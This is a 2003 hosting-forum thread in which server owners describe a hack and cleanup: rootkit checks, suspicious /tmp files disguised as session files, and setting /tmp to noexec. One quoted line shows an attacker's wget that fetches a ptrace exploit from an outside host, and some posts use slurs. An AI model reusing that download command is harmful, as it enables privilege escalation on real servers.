Re: new server got hacked

**Diatone** · 12-24-2003 01:49 AM

http://www.delta5.com.br/mirror/topdefacer/

Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.

**compunet2** · 12-24-2003 02:42 AM

Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol

**ivaserver** · 12-24-2003 05:17 AM

my server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs

**ivaserver** · 12-24-2003 07:13 AM

deleted

**B12Org** · 12-29-2003 04:47 PM

Originally posted by brumie
oh yes just delete that uid
i seen that too and delete the user line:
pico /etc/passwd

but believe it or not there must be hidden process
run chkrootkit (search on this forum on how to install it)
also check on tmp

cd /tmp
ls -la

find weird unussual files/directory there
but it'll be good if u releod the OS and get kernel update and find some threads about securing whm/cpanel, i found it very usefull

What counts as wierd or unusal files/dirs?

**brumie** · 12-29-2003 11:59 PM

What counts as wierd or unusal files/dirs?

files are excutebale

on the xmas day, my friend's server almost got hack
u should check that weird file:

so far we found this kind of files on several servers /tmp:
.xcgi
r00t
w00t
xp
xmas
gift
r0nin
anyname.c --> cc code compile able

i'm sure there must be lots way they trying to hack
sometimes they also mk directory name pretending like it was a session files

-rw------- 1 nobody nobody 0 Dec 29 10:51 sess_f7139ec439e5ad737c9c22723b140123
drwxr-xr-x 2 nobody nobody 4096 Dec 29 16:41 sess_f7139ec439e5ad737c9c22723b140xxx
-rw------- 1 nobody nobody 435 Dec 28 23:42 sess_fa205a6f3a4b7a5d3a3affb915522456

see the permission drwxr-xr-x
that's directory, the man that got our server was did with that way, i can't believe when i'm enter that directory and found many executable files there

anyway that was little story of my nightmares, i'm moving to another provider that helped me lots securing my box and watching like hawk

oh yeah i can sleep better....

suggestion: search thread on this forum about secure your box

set tmp with noexec:
http://forums.ev1servers.net/showthr...threadid=27771

correct me if i'm wrong

**B12Org** · 12-30-2003 01:34 AM

Oh, ok. I wasnt sure if you meant obviously unusual files, or computer nerd obvious. Thanks.

**micron** · 12-30-2003 07:51 AM

Originally posted by brumie

Code:

... wget www.viperhaxu.hpg.com.br/ptrace ...

Here are your hackers. Looks like 13 year olds.

**B12Org** · 12-30-2003 10:29 AM

That file that you referenced is empty text file. Looks like whatever it was, its gone now. My experience was with a group calling themselves "techteam". Some hackers they were, they had to make their web page with frontpage

**mc303** · 04-29-2004 01:00 PM

excellent resource of knowledge
Thank you

LinkBack

Thread Tools

Re: new server got hacked

Is my server hacked?

my server is hacked

server has been hacked

Server get hacked

my server got hacked?